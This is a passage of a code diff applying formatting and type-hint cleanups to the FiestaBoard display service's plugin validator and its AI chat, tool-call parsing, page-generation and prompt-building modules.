         Tuple of (manifest_dict, error_message)
     """
     manifest_path = plugin_dir / "manifest.json"
-    
+
     if not manifest_path.exists():
         return None, f"manifest.json not found in {plugin_dir.name}"
-    
+
     try:
-        with open(manifest_path, "r", encoding="utf-8") as f:
+        with open(manifest_path, encoding="utf-8") as f:
             return json.load(f), None
     except json.JSONDecodeError as e:
         return None, f"Invalid JSON in manifest.json: {e}"
@@ -107,36 +106,36 @@ def load_manifest(plugin_dir: Path) -> Tuple[Optional[Dict], Optional[str]]:
         return None, f"Failed to read manifest.json: {e}"
 
 
-def validate_manifest_schema(manifest: Dict, plugin_dir_name: str) -> List[str]:
+def validate_manifest_schema(manifest: dict, plugin_dir_name: str) -> list[str]:
     """Validate manifest against required schema.
-    
+
     Returns:
         List of error messages
     """
     errors = []
-    
+
     # Required fields
     required_fields = ["id", "name", "version"]
     for field in required_fields:
         if field not in manifest:
             errors.append(f"Missing required field: {field}")
-    
+
     if errors:
         return errors
-    
+
     # Validate ID format
     plugin_id = manifest.get("id", "")
     if not plugin_id:
         errors.append("Plugin id cannot be empty")
     elif not plugin_id[0].islower() or not plugin_id[0].isalpha():
         errors.append("Plugin id must start with a lowercase letter")
-    elif not all(c.islower() or c.isdigit() or c == '_' for c in plugin_id):
+    elif not all(c.islower() or c.isdigit() or c == "_" for c in plugin_id):
         errors.append("Plugin id must contain only lowercase letters, numbers, and underscores")
-    
+
     # Validate ID matches directory name
     if plugin_id != plugin_dir_name:
         errors.append(f"Plugin id '{plugin_id}' does not match directory name '{plugin_dir_name}'")
-    
+
     # Validate version format (semantic versioning)
     version = manifest.get("version", "")
     if version:
@@ -148,12 +147,12 @@ def validate_manifest_schema(manifest: Dict, plugin_dir_name: str) -> List[str]:
                 if not part.isdigit():
                     errors.append("Version parts must be integers")
                     break
-    
+
     # Validate settings_schema if present
     settings = manifest.get("settings_schema", {})
     if settings and not isinstance(settings, dict):
         errors.append("settings_schema must be an object")
-    
+
     # Validate env_vars if present
     env_vars = manifest.get("env_vars", [])
     if not isinstance(env_vars, list):
@@ -164,12 +163,12 @@ def validate_manifest_schema(manifest: Dict, plugin_dir_name: str) -> List[str]:
                 errors.append(f"env_vars[{i}] must be an object")
             elif "name" not in env_var:
                 errors.append(f"env_vars[{i}] missing required field: name")
-    
+
     # Validate variables if present
     variables = manifest.get("variables", {})
     if variables and not isinstance(variables, dict):
         errors.append("variables must be an object")
-    
+
     # Validate max_lengths if present
     max_lengths = manifest.get("max_lengths", {})
     if max_lengths:
@@ -179,40 +178,40 @@ def validate_manifest_schema(manifest: Dict, plugin_dir_name: str) -> List[str]:
             for key, value in max_lengths.items():
                 if not isinstance(value, int) or value < 1:
                     errors.append(f"max_lengths.{key} must be a positive integer")
-    
+
     # Validate icon if present
     icon = manifest.get("icon", "")
     if icon and not isinstance(icon, str):
         errors.append("icon must be a string")
-    
+
     # Validate category if present
     valid_categories = ["art", "data", "transit", "weather", "entertainment", "utility", "home"]
     category = manifest.get("category", "")
     if category and category not in valid_categories:
         errors.append(f"category must be one of: {', '.join(valid_categories)}")
-    
+
     return errors
 
 
-def validate_plugin_structure(plugin_dir: Path) -> Tuple[List[str], List[str]]:
+def validate_plugin_structure(plugin_dir: Path) -> tuple[list[str], list[str]]:
     """Validate plugin directory structure.
-    
+
     Returns:
         Tuple of (errors, warnings)
     """
     errors = []
     warnings = []
-    
+
     # Required files
     required_files = ["__init__.py", "manifest.json"]
     for filename in required_files:
         if not (plugin_dir / filename).exists():
             errors.append(f"Missing required file: {filename}")
-    
+
     # Recommended files
     if not (plugin_dir / "README.md").exists():
         warnings.append("Missing recommended file: README.md")
-    
+
     # Tests directory
     tests_dir = plugin_dir / "tests"
     if not tests_dir.exists():
@@ -222,48 +221,48 @@ def validate_plugin_structure(plugin_dir: Path) -> Tuple[List[str], List[str]]:
         test_files = list(tests_dir.glob("test_*.py"))
         if not test_files:
             warnings.append("No test files (test_*.py) found in tests/ directory")
-    
+
     return errors, warnings
 
 
 def validate_plugin(plugin_dir: Path) -> ValidationResult:
     """Validate a single plugin.
-    
+
     Returns:
         ValidationResult with errors and warnings
     """
     result = ValidationResult(plugin_dir.name)
-    
+
     # Validate structure
     structure_errors, structure_warnings = validate_plugin_structure(plugin_dir)
     for error in structure_errors:
         result.add_error(error)
     for warning in structure_warnings:
         result.add_warning(warning)
-    
+
     # Load and validate manifest
     manifest, load_error = load_manifest(plugin_dir)
     if load_error:
         result.add_error(load_error)
         return result
-    
+
     # Validate manifest schema
     schema_errors = validate_manifest_schema(manifest, plugin_dir.name)
     for error in schema_errors:
         result.add_error(error)
-    
+
     return result
 
 
-def validate_unique_ids(plugins: List[Path]) -> List[str]:
+def validate_unique_ids(plugins: list[Path]) -> list[str]:
     """Check that all plugin IDs are unique.
-    
+
     Returns:
         List of error messages for duplicate IDs
     """
     errors = []
-    id_to_dirs: Dict[str, List[str]] = {}
-    
+    id_to_dirs: dict[str, list[str]] = {}
+
     for plugin_dir in plugins:
         manifest, _ = load_manifest(plugin_dir)
         if manifest:
@@ -272,14 +271,12 @@ def validate_unique_ids(plugins: List[Path]) -> List[str]:
                 if plugin_id not in id_to_dirs:
                     id_to_dirs[plugin_id] = []
                 id_to_dirs[plugin_id].append(plugin_dir.name)
-    
+
     # Check for duplicates
     for plugin_id, dirs in id_to_dirs.items():
         if len(dirs) > 1:
-            errors.append(
-                f"Duplicate plugin ID '{plugin_id}' found in directories: {', '.join(dirs)}"
-            )
-    
+            errors.append(f"Duplicate plugin ID '{plugin_id}' found in directories: {', '.join(dirs)}")
+
     return errors
 
 
@@ -302,11 +299,11 @@ def _repo_name_from_url(url: str) -> str:
 
 def _plugin_id_from_repo_name(repo_name: str) -> str:
     if repo_name.startswith(REGISTRY_PREFIX):
-        return repo_name[len(REGISTRY_PREFIX):].replace("-", "_")
+        return repo_name[len(REGISTRY_PREFIX) :].replace("-", "_")
     return repo_name.replace("-", "_")
 
 
-def validate_registry_entry(entry: Dict, verbose: bool) -> List[str]:
+def validate_registry_entry(entry: dict, verbose: bool) -> list[str]:
     """Validate a single registry entry dict. Returns list of error strings."""
     errors = []
     plugin_id = entry.get("id", "")
@@ -323,8 +320,7 @@ def validate_registry_entry(entry: Dict, verbose: bool) -> List[str]:
     repo_name = _repo_name_from_url(repo_url)
     if not REGISTRY_NAME_RE.match(repo_name):
         errors.append(
-            f"[{plugin_id}] Repository name '{repo_name}' does not follow "
-            f"'{REGISTRY_PREFIX}{{name}}' convention"
+            f"[{plugin_id}] Repository name '{repo_name}' does not follow '{REGISTRY_PREFIX}{{name}}' convention"
         )
 
     # 2. ID consistency with repo name
@@ -339,8 +335,7 @@ def validate_registry_entry(entry: Dict, verbose: bool) -> List[str]:
     fv = entry.get("fiestaboard_version", "")
     if fv and not SEMVER_CONSTRAINT_RE.match(fv.strip()):
         errors.append(
-            f"[{plugin_id}] fiestaboard_version '{fv}' is not a valid semver "
-            f"constraint (expected e.g. '>=2.10.0')"
+            f"[{plugin_id}] fiestaboard_version '{fv}' is not a valid semver constraint (expected e.g. '>=2.10.0')"
         )
 
     # 4. Repo reachability via git ls-remote
@@ -388,15 +383,15 @@ def validate_registry_entry(entry: Dict, verbose: bool) -> List[str]:
     return errors
 
 
-def validate_registry(verbose: bool) -> List[str]:
+def validate_registry(verbose: bool) -> list[str]:
     """Validate plugin-registry.json. Returns list of error strings."""
-    errors: List[str] = []
+    errors: list[str] = []
 
     if not REGISTRY_FILE.exists():
         return [f"Registry file not found: {REGISTRY_FILE}"]
 
     try:
-        with open(REGISTRY_FILE, "r", encoding="utf-8") as f:
+        with open(REGISTRY_FILE, encoding="utf-8") as f:
             data = json.load(f)
     except json.JSONDecodeError as exc:
         return [f"Registry file is invalid JSON: {exc}"]
@@ -409,7 +404,7 @@ def validate_registry(verbose: bool) -> List[str]:
         print(f"Validating {len(plugins)} registry entries...")
         print()
 
-    seen_ids: Dict[str, int] = {}
+    seen_ids: dict[str, int] = {}
     for i, entry in enumerate(plugins):
         entry_errors = validate_registry_entry(entry, verbose)
         errors.extend(entry_errors)
@@ -423,24 +418,10 @@ def validate_registry(verbose: bool) -> List[str]:
 
 
 def main():
-    parser = argparse.ArgumentParser(
-        description="Validate FiestaBoard plugin integrity"
-    )
-    parser.add_argument(
-        "--strict",
-        action="store_true",
-        help="Fail on warnings (missing tests, etc.)"
-    )
-    parser.add_argument(
-        "--verbose", "-v",
-        action="store_true",
-        help="Show detailed output"
-    )
-    parser.add_argument(
-        "--plugin",
-        type=str,
-        help="Validate specific plugin only"
-    )
+    parser = argparse.ArgumentParser(description="Validate FiestaBoard plugin integrity")
+    parser.add_argument("--strict", action="store_true", help="Fail on warnings (missing tests, etc.)")
+    parser.add_argument("--verbose", "-v", action="store_true", help="Show detailed output")
+    parser.add_argument("--plugin", type=str, help="Validate specific plugin only")
     parser.add_argument(
         "--registry",
         action="store_true",
@@ -448,7 +429,7 @@ def main():
     )
 
     args = parser.parse_args()
-    
+
     print("FiestaBoard Plugin Validator")
     print("=" * 50)
     print()
@@ -478,32 +459,32 @@ def main():
 
     # Discover plugins
     plugins = discover_plugin_directories()
-    
+
     if args.plugin:
         plugins = [p for p in plugins if p.name == args.plugin]
         if not plugins:
             print(f"Error: Plugin '{args.plugin}' not found")
             sys.exit(2)
-    
+
     if not plugins:
         print("No plugins found to validate.")
         print(f"Plugins directory: {PLUGINS_DIR}")
         sys.exit(0)
-    
+
     print(f"Found {len(plugins)} plugin(s) to validate:")
     for p in plugins:
         print(f"  - {p.name}")
     print()
-    
+
     # Validate each plugin
-    results: List[ValidationResult] = []
+    results: list[ValidationResult] = []
     for plugin_dir in plugins:
         if args.verbose:
             print(f"Validating: {plugin_dir.name}")
-        
+
         result = validate_plugin(plugin_dir)
         results.append(result)
-        
+
         if args.verbose:
             if result.errors:
                 for error in result.errors:
@@ -512,32 +493,32 @@ def main():
                 for warning in result.warnings:
                     print(f"  WARNING: {warning}")
             print()
-    
+
     # Check for duplicate IDs across all plugins
     print("Checking for duplicate plugin IDs...")
     duplicate_errors = validate_unique_ids(plugins)
     for error in duplicate_errors:
         print(f"  ERROR: {error}")
     print()
-    
+
     # Summary
     print("=" * 50)
     print("VALIDATION SUMMARY")
     print("=" * 50)
-    
+
     total_errors = sum(len(r.errors) for r in results) + len(duplicate_errors)
     total_warnings = sum(len(r.warnings) for r in results)
-    
+
     passed = [r for r in results if r.is_valid]
     failed = [r for r in results if not r.is_valid]
-    
+
     print(f"Plugins validated: {len(results)}")
     print(f"  Passed: {len(passed)}")
     print(f"  Failed: {len(failed)}")
     print(f"Total errors: {total_errors}")
     print(f"Total warnings: {total_warnings}")
     print()
-    
+
     # List failures
     if failed:
         print("Failed plugins:")
@@ -545,21 +526,21 @@ def main():
             print(f"  - {result.plugin_id}")
             for error in result.errors:
                 print(f"      ERROR: {error}")
-    
+
     if duplicate_errors:
         print("\nDuplicate ID errors:")
         for error in duplicate_errors:
             print(f"  {error}")
-    
+
     # List warnings
     if total_warnings > 0 and args.verbose:
         print("\nWarnings:")
         for result in results:
             for warning in result.warnings:
                 print(f"  [{result.plugin_id}] {warning}")
-    
+
     print()
-    
+
     # Determine exit code
     if total_errors > 0:
         print("VALIDATION FAILED")
@@ -574,4 +555,3 @@ def main():
 
 if __name__ == "__main__":
     main()
-

--- a/src/__init__.py
+++ b/src/__init__.py
@@ -1,4 +1,3 @@
 """FiestaBoard Display Service - Main package."""
 
 __version__ = "6.11.2"
-

--- a/src/ai/__init__.py
+++ b/src/ai/__init__.py
@@ -13,8 +13,8 @@ from .generator import AIGenerationError, generate_page
 from .prompt_builder import PromptContext, build_prompt
 
 __all__ = [
-    "build_prompt",
-    "PromptContext",
-    "generate_page",
     "AIGenerationError",
+    "PromptContext",
+    "build_prompt",
+    "generate_page",
 ]

--- a/src/ai/chat.py
+++ b/src/ai/chat.py
@@ -582,7 +582,7 @@ async def stream_chat(
     if history:
         # Keep history right after the system prompt so the model sees
         # the conversation in order.
-        full_messages = [base_messages[0]] + history + base_messages[1:]
+        full_messages = [base_messages[0], *history, *base_messages[1:]]
     else:
         full_messages = base_messages
 

--- a/src/ai/chat.py
+++ b/src/ai/chat.py
@@ -33,7 +33,8 @@ from typing import Any, Literal
 
 import httpx
 
-from ..devices import DeviceType
+from src.devices import DeviceType
+
 from .chat_ops import ToolCallValidationError, parse_tool_call, supported_ops
 from .generator import (
     AIGenerationError,
@@ -428,19 +429,19 @@ _GLOBAL_SURFACE_INTRO = (
 _EDITOR_CREATION_BIAS = (
     "   When the user asks to CREATE, MAKE, DESIGN, or BUILD a page from\n"
     "   inside the editor, they almost always mean \"turn the page I'm\n"
-    "   editing into that\" — use `replace_page` (or `apply_patch` for an\n"
+    '   editing into that" — use `replace_page` (or `apply_patch` for an\n'
     "   incremental change). Reserve `navigate_to_page` for explicit\n"
-    "   requests like \"open my weather page\" or \"start a new page\".\n"
+    '   requests like "open my weather page" or "start a new page".\n'
 )
 
 
 _GLOBAL_CREATION_BIAS = (
-    "   IMPORTANT — \"make\" bias: when the user asks to CREATE, MAKE,\n"
+    '   IMPORTANT — "make" bias: when the user asks to CREATE, MAKE,\n'
     "   DESIGN, or BUILD a page, display, layout, or visual, default to\n"
-    "   opening the page editor with `\"page_id\": \"new\"`. The page\n"
+    '   opening the page editor with `"page_id": "new"`. The page\n'
     "   editor is the canvas where users author content; do not write\n"
     "   template content remotely from the global drawer. Example:\n"
-    "   \"make me a weather page\" → navigate_to_page with page_id: \"new\".\n"
+    '   "make me a weather page" → navigate_to_page with page_id: "new".\n'
 )
 
 
@@ -464,13 +465,7 @@ def _build_tool_grammar_addendum(surface: ChatSurface) -> str:
     else:
         intro = _GLOBAL_SURFACE_INTRO
         bias = _GLOBAL_CREATION_BIAS
-    return (
-        "\n\nCHAT MODE — TOOL GRAMMAR\n\n"
-        + intro
-        + _TOOL_GRAMMAR_BODY_HEAD
-        + bias
-        + _TOOL_GRAMMAR_BODY_TAIL
-    )
+    return "\n\nCHAT MODE — TOOL GRAMMAR\n\n" + intro + _TOOL_GRAMMAR_BODY_HEAD + bias + _TOOL_GRAMMAR_BODY_TAIL
 
 
 # ---------------------------------------------------------------------------
@@ -582,17 +577,12 @@ async def stream_chat(
     base_messages = list(context.to_messages())
     base_messages[0] = {
         "role": "system",
-        "content": (
-            base_messages[0]["content"]
-            + _build_tool_grammar_addendum(surface)
-        ),
+        "content": (base_messages[0]["content"] + _build_tool_grammar_addendum(surface)),
     }
     if history:
         # Keep history right after the system prompt so the model sees
         # the conversation in order.
-        full_messages = (
-            [base_messages[0]] + history + base_messages[1:]
-        )
+        full_messages = [base_messages[0]] + history + base_messages[1:]
     else:
         full_messages = base_messages
 
@@ -637,25 +627,16 @@ async def stream_chat(
         )
 
         try:
-            async with client.stream(
-                "POST", url, headers=headers, json=payload
-            ) as response:
+            async with client.stream("POST", url, headers=headers, json=payload) as response:
                 if response.status_code >= 400:
                     err_msg = await _extract_error_message(response, protocol)
                     yield {
                         "event": "error",
-                        "data": {
-                            "message": (
-                                f"AI provider returned {response.status_code}: "
-                                f"{err_msg}"
-                            )
-                        },
+                        "data": {"message": (f"AI provider returned {response.status_code}: {err_msg}")},
                     }
                     return
 
-                async for delta_event in _iter_provider_stream(
-                    response, protocol, usage
-                ):
+                async for delta_event in _iter_provider_stream(response, protocol, usage):
                     if delta_event["kind"] == "text":
                         text = delta_event["text"]
                         for emit in fence_parser.feed(text):
@@ -696,9 +677,7 @@ async def stream_chat(
 # ---------------------------------------------------------------------------
 
 
-async def _extract_error_message(
-    response: httpx.Response, protocol: Protocol
-) -> str:
+async def _extract_error_message(response: httpx.Response, protocol: Protocol) -> str:
     """Best-effort extraction of an upstream error message."""
     try:
         body = await response.aread()
@@ -790,9 +769,7 @@ def _openai_delta_text(event: dict[str, Any]) -> str:
     return ""
 
 
-def _absorb_openai_usage(
-    event: dict[str, Any], usage: dict[str, int | None]
-) -> None:
+def _absorb_openai_usage(event: dict[str, Any], usage: dict[str, int | None]) -> None:
     u = event.get("usage")
     if isinstance(u, dict):
         if isinstance(u.get("prompt_tokens"), int):
@@ -813,9 +790,7 @@ def _anthropic_delta_text(event: dict[str, Any]) -> str:
     return ""
 
 
-def _absorb_anthropic_usage(
-    event: dict[str, Any], usage: dict[str, int | None]
-) -> None:
+def _absorb_anthropic_usage(event: dict[str, Any], usage: dict[str, int | None]) -> None:
     if event.get("type") == "message_start":
         msg = event.get("message") or {}
         u = msg.get("usage") or {}
@@ -879,7 +854,7 @@ class _FenceParser:
                 # Close: text up to start of ``` is the final fence
                 # contents.
                 self._fence_buffer += self._buffer[: close.start()]
-                self._buffer = self._buffer[close.end():]
+                self._buffer = self._buffer[close.end() :]
                 events.extend(self._finalize_fence())
                 self._in_fence = False
                 self._fence_buffer = ""
@@ -900,9 +875,7 @@ class _FenceParser:
                     self._buffer = self._buffer[-hold:]
                 else:
                     if self._buffer:
-                        events.append(
-                            {"event": "text", "data": {"delta": self._buffer}}
-                        )
+                        events.append({"event": "text", "data": {"delta": self._buffer}})
                     self._buffer = ""
                 return events
 
@@ -912,7 +885,7 @@ class _FenceParser:
                 events.append({"event": "text", "data": {"delta": prose}})
             # Skip past the fence open marker; allow optional trailing
             # newline before the body starts.
-            after = self._buffer[m.end():]
+            after = self._buffer[m.end() :]
             if after.startswith("\r\n"):
                 after = after[2:]
             elif after.startswith("\n"):
@@ -930,12 +903,7 @@ class _FenceParser:
             events.append(
                 {
                     "event": "warning",
-                    "data": {
-                        "message": (
-                            "Model emitted an unterminated `fiestaboard` "
-                            "fence; ignored."
-                        )
-                    },
+                    "data": {"message": ("Model emitted an unterminated `fiestaboard` fence; ignored.")},
                 }
             )
             self._in_fence = False
@@ -968,30 +936,30 @@ class _FenceParser:
         """
         body = self._fence_buffer.strip()
         if not body:
-            return [{
-                "event": "warning",
-                "data": {"message": "Empty fiestaboard tool block; ignored."},
-            }]
+            return [
+                {
+                    "event": "warning",
+                    "data": {"message": "Empty fiestaboard tool block; ignored."},
+                }
+            ]
         try:
             parsed = json.loads(body)
         except json.JSONDecodeError as exc:
-            return [{
-                "event": "warning",
-                "data": {
-                    "message": (
-                        f"Could not parse fiestaboard tool block: {exc.msg}"
-                    )
-                },
-            }]
+            return [
+                {
+                    "event": "warning",
+                    "data": {"message": (f"Could not parse fiestaboard tool block: {exc.msg}")},
+                }
+            ]
         try:
             tool = parse_tool_call(parsed)
         except ToolCallValidationError as exc:
-            return [{
-                "event": "warning",
-                "data": {
-                    "message": f"Invalid fiestaboard tool block: {exc}"
-                },
-            }]
+            return [
+                {
+                    "event": "warning",
+                    "data": {"message": f"Invalid fiestaboard tool block: {exc}"},
+                }
+            ]
 
         # Repair common ``{{filled:...}}`` mistakes in any template
         # lines the tool call carries. We mutate the validated args
@@ -1001,14 +969,16 @@ class _FenceParser:
         events: list[dict[str, Any]] = []
         for warning in _repair_tool_template_lines(tool):
             events.append({"event": "warning", "data": {"message": warning}})
-        events.append({
-            "event": "tool_call",
-            "data": {
-                "id": secrets.token_urlsafe(8),
-                "op": tool.op,
-                "args": tool.args.model_dump(mode="json"),
-            },
-        })
+        events.append(
+            {
+                "event": "tool_call",
+                "data": {
+                    "id": secrets.token_urlsafe(8),
+                    "op": tool.op,
+                    "args": tool.args.model_dump(mode="json"),
+                },
+            }
+        )
         return events
 
 
@@ -1051,7 +1021,7 @@ def _repair_tool_template_lines(tool: Any) -> list[str]:
 
 
 __all__ = [
+    "_FenceParser",
     "stream_chat",
     "supported_ops",
-    "_FenceParser",
 ]

--- a/src/ai/chat_ops.py
+++ b/src/ai/chat_ops.py
@@ -532,9 +532,7 @@ def parse_tool_call(payload: object) -> ToolCall:
         raise ToolCallValidationError("Tool call must be a JSON object.")
     op = payload.get("op")
     if not isinstance(op, str):
-        raise ToolCallValidationError(
-            "Tool call is missing the required 'op' string."
-        )
+        raise ToolCallValidationError("Tool call is missing the required 'op' string.")
     model_cls = _OP_REGISTRY.get(op)
     if model_cls is None:
         raise ToolCallValidationError(f"Unknown tool op: {op!r}")

--- a/src/ai/generator.py
+++ b/src/ai/generator.py
@@ -22,8 +22,9 @@ from typing import Any
 import httpx
 from pydantic import ValidationError
 
-from ..devices import DeviceType, get_dimensions
-from ..pages.models import Page, PageCreate
+from src.devices import DeviceType, get_dimensions
+from src.pages.models import Page, PageCreate
+
 from .prompt_builder import PromptContext, build_prompt
 from .protocols import Protocol, get_protocol
 from .template_validator import repair_template_lines
@@ -82,9 +83,7 @@ def _extract_json_object(text: str) -> dict[str, Any]:
         try:
             return json.loads(candidate)
         except json.JSONDecodeError as exc:
-            raise AIGenerationError(
-                f"Model output was not valid JSON: {exc}"
-            ) from exc
+            raise AIGenerationError(f"Model output was not valid JSON: {exc}") from exc
     raise AIGenerationError("Model output did not contain a JSON object.")
 
 
@@ -128,31 +127,24 @@ def _validate_and_repair(
     name = raw.get("name")
     if not isinstance(name, str) or not name.strip():
         page["name"] = "AI Page"
-        warnings.append("Model did not return a name; using \"AI Page\".")
+        warnings.append('Model did not return a name; using "AI Page".')
     else:
         page["name"] = name.strip()[:100]
 
     # type — always template for AI pages.
     if raw.get("type") not in (None, "template"):
-        warnings.append(
-            f"Model returned type={raw.get('type')!r}; coerced to 'template'."
-        )
+        warnings.append(f"Model returned type={raw.get('type')!r}; coerced to 'template'.")
     page["type"] = "template"
 
     # device_type — force to requested.
     if raw.get("device_type") not in (None, device_type):
-        warnings.append(
-            f"Model returned device_type={raw.get('device_type')!r}; "
-            f"coerced to {device_type!r}."
-        )
+        warnings.append(f"Model returned device_type={raw.get('device_type')!r}; coerced to {device_type!r}.")
     page["device_type"] = device_type
 
     # template lines
     template = raw.get("template")
     if not isinstance(template, list) or not template:
-        raise AIGenerationError(
-            "Model output is missing the required 'template' list."
-        )
+        raise AIGenerationError("Model output is missing the required 'template' list.")
     template = [str(line) if line is not None else "" for line in template]
 
     # Repair common ``{{filled:...}}`` mistakes before length/width
@@ -164,16 +156,10 @@ def _validate_and_repair(
 
     # Pad/trim to exact device row count.
     if len(template) < dims.rows:
-        warnings.append(
-            f"Model returned {len(template)} lines; padded to {dims.rows} for "
-            f"{device_type}."
-        )
+        warnings.append(f"Model returned {len(template)} lines; padded to {dims.rows} for {device_type}.")
         template = template + [""] * (dims.rows - len(template))
     elif len(template) > dims.rows:
-        warnings.append(
-            f"Model returned {len(template)} lines; truncated to {dims.rows} "
-            f"for {device_type}."
-        )
+        warnings.append(f"Model returned {len(template)} lines; truncated to {dims.rows} for {device_type}.")
         template = template[: dims.rows]
 
     # line_metadata
@@ -222,10 +208,7 @@ def _validate_and_repair(
     # tolerates unknown vars and the user may simply enable a plugin).
     unknown = _find_unknown_variables(template, known_variables)
     for ref in unknown:
-        warnings.append(
-            f"Template references unknown variable {{{{{ref}}}}}. The "
-            "plugin may not be enabled."
-        )
+        warnings.append(f"Template references unknown variable {{{{{ref}}}}}. The plugin may not be enabled.")
 
     # Final structural validation via Pydantic.
     try:
@@ -239,16 +222,12 @@ def _validate_and_repair(
     except ValidationError as exc:
         # Pydantic ValidationError messages are curated and safe to
         # surface — they describe the field that failed, not internals.
-        raise AIGenerationError(
-            f"Model output failed validation: {exc}"
-        ) from exc
+        raise AIGenerationError(f"Model output failed validation: {exc}") from exc
     except Exception as exc:
         # Defensive: anything else here is unexpected. Log it but
         # don't expose the raw message to the API consumer.
         logger.exception("Unexpected error validating model output")
-        raise AIGenerationError(
-            "Model output failed validation."
-        ) from exc
+        raise AIGenerationError("Model output failed validation.") from exc
 
     return page, warnings
 
@@ -283,14 +262,10 @@ def _resolve_provider(
     Falls back to the configured default; raises if nothing is usable.
     """
     if not providers_block.get("enabled"):
-        raise AIGenerationError(
-            "AI providers are not enabled. Configure one in Settings first."
-        )
+        raise AIGenerationError("AI providers are not enabled. Configure one in Settings first.")
     providers = providers_block.get("providers") or []
     if not providers:
-        raise AIGenerationError(
-            "No AI providers are configured. Add one in Settings first."
-        )
+        raise AIGenerationError("No AI providers are configured. Add one in Settings first.")
 
     if provider_id:
         for provider in providers:
@@ -316,10 +291,7 @@ def _resolve_model(provider: dict[str, Any], model: str | None) -> str:
     models = provider.get("models") or []
     if models:
         return models[0]
-    raise AIGenerationError(
-        f"AI provider {provider.get('name', provider.get('id'))!r} has no "
-        "models configured."
-    )
+    raise AIGenerationError(f"AI provider {provider.get('name', provider.get('id'))!r} has no models configured.")
 
 
 def _build_request_payload(
@@ -371,9 +343,7 @@ async def _post_chat_completion(
             # Don't echo the raw httpx exception message — it can include
             # URL/host details and CodeQL flags it as stack-trace exposure.
             logger.warning("AI provider HTTP error: %s", exc)
-            raise AIGenerationError(
-                "Could not reach AI provider."
-            ) from exc
+            raise AIGenerationError("Could not reach AI provider.") from exc
         if response.status_code >= 400:
             # Try to surface the provider's own error message via the
             # protocol-specific error parser.
@@ -386,9 +356,7 @@ async def _post_chat_completion(
                 err_msg = None
             if not err_msg:
                 err_msg = response.text
-            raise AIGenerationError(
-                f"AI provider returned {response.status_code}: {err_msg}"
-            )
+            raise AIGenerationError(f"AI provider returned {response.status_code}: {err_msg}")
         try:
             return response.json()
         except Exception as exc:
@@ -396,9 +364,7 @@ async def _post_chat_completion(
             # message — only that it was non-JSON. The full exception is
             # logged for debugging.
             logger.warning("AI provider returned non-JSON response: %s", exc)
-            raise AIGenerationError(
-                "AI provider returned a non-JSON response."
-            ) from exc
+            raise AIGenerationError("AI provider returned a non-JSON response.") from exc
     finally:
         if owns_client:
             await client.aclose()
@@ -457,9 +423,7 @@ async def generate_page(
     )
 
     payload = _build_request_payload(chosen_model, context, protocol)
-    api_response = await _post_chat_completion(
-        provider, payload, protocol=protocol, client=client
-    )
+    api_response = await _post_chat_completion(provider, payload, protocol=protocol, client=client)
 
     text = _extract_message_content(api_response, protocol)
     raw = _extract_json_object(text)
@@ -520,10 +484,7 @@ async def test_provider(
         logger.exception("Unexpected error during provider test")
         return {
             "ok": False,
-            "message": (
-                "Unexpected error contacting the provider. "
-                "See server logs for details."
-            ),
+            "message": ("Unexpected error contacting the provider. See server logs for details."),
             "model_used": chosen_model,
         }
 

--- a/src/ai/prompt_builder.py
+++ b/src/ai/prompt_builder.py
@@ -14,8 +14,8 @@ import json
 from dataclasses import dataclass, field
 from typing import Any, Literal
 
-from ..devices import DeviceType, get_dimensions
-from ..templates.expressions import function_signatures
+from src.devices import DeviceType, get_dimensions
+from src.templates.expressions import function_signatures
 
 # Which caller is building the prompt. The shared core (device limits,
 # character set, syntax, available variables, exemplars) is identical
@@ -156,8 +156,7 @@ class PromptContext:
                     "role": "user",
                     "content": (
                         "The user is refining an existing page. Current page "
-                        "JSON:\n"
-                        + json.dumps(self.current_page, indent=2)
+                        "JSON:\n" + json.dumps(self.current_page, indent=2)
                     ),
                 }
             )
@@ -187,9 +186,7 @@ def _format_builtins() -> str:
     sigs = function_signatures()
     by_cat: dict[str, list[str]] = {}
     for _name, info in sigs.items():
-        by_cat.setdefault(info["category"], []).append(
-            f"  {info['signature']:<40} — {info['summary']}"
-        )
+        by_cat.setdefault(info["category"], []).append(f"  {info['signature']:<40} — {info['summary']}")
     order = ["logic", "math", "text", "convert", "color"]
     lines: list[str] = []
     for cat in order:
@@ -265,10 +262,7 @@ def _format_available_pages(pages: list[dict[str, Any]]) -> str:
     """Render a compact list of pages the user can navigate to."""
     if not pages:
         return "(no pages yet)"
-    return "\n".join(
-        f'  - "{p.get("name", "Untitled")}" (id: {p.get("id", "?")})'
-        for p in pages
-    )
+    return "\n".join(f'  - "{p.get("name", "Untitled")}" (id: {p.get("id", "?")})' for p in pages)
 
 
 def _summarize_schema(schema: dict[str, Any] | None) -> str:
@@ -311,7 +305,7 @@ def _format_installed_plugins(plugins: list[dict[str, Any]]) -> str:
         status = "enabled" if p.get("enabled") else "disabled"
         schema_line = _summarize_schema(p.get("settings_schema"))
         schema_part = f"\n    config schema: {schema_line}" if schema_line else ""
-        lines.append(f'  - {p.get("id", "?")} ({p.get("name", "?")}) — {status}{schema_part}')
+        lines.append(f"  - {p.get('id', '?')} ({p.get('name', '?')}) — {status}{schema_part}")
     return "\n".join(lines)
 
 
@@ -324,7 +318,7 @@ def _format_registry_plugins(plugins: list[dict[str, Any]]) -> str:
         installed = " [already installed]" if p.get("installed") else ""
         desc = p.get("description", "")
         desc_part = f" — {desc}" if desc else ""
-        lines.append(f'  - {p.get("id", "?")} ({p.get("name", "?")!r}){desc_part}{installed}')
+        lines.append(f"  - {p.get('id', '?')} ({p.get('name', '?')!r}){desc_part}{installed}")
     return "\n".join(lines)
 
 
@@ -340,9 +334,7 @@ def _format_available_schedules(schedules: list[dict[str, Any]]) -> str:
         enabled = "enabled" if s.get("enabled", True) else "disabled"
         page_id = s.get("page_id", "?")
         sid = s.get("id", "?")
-        lines.append(
-            f"  - id: {sid} | page: {page_id} | {start}-{end} | {pattern} | {enabled}"
-        )
+        lines.append(f"  - id: {sid} | page: {page_id} | {start}-{end} | {pattern} | {enabled}")
     return "\n".join(lines)
 
 
@@ -356,9 +348,7 @@ def _format_available_carousels(carousels: list[dict[str, Any]]) -> str:
         cid = c.get("id", "?")
         pages = c.get("page_ids", [])
         interval = c.get("interval_seconds", 30)
-        lines.append(
-            f'  - "{name}" (id: {cid}) | {len(pages)} pages | {interval}s interval'
-        )
+        lines.append(f'  - "{name}" (id: {cid}) | {len(pages)} pages | {interval}s interval')
     return "\n".join(lines)
 
 
@@ -447,8 +437,8 @@ def build_prompt(
         f"  the number of other rows accordingly).\n"
         f"- `line_metadata` must have the same length as `template`.\n"
         f"  Each entry is `{{alignment, wrap}}`:\n"
-        f"    - `alignment`: \"left\" | \"center\" | \"right\" (no\n"
-        f"      \"justify\"). Drives how the line is positioned within\n"
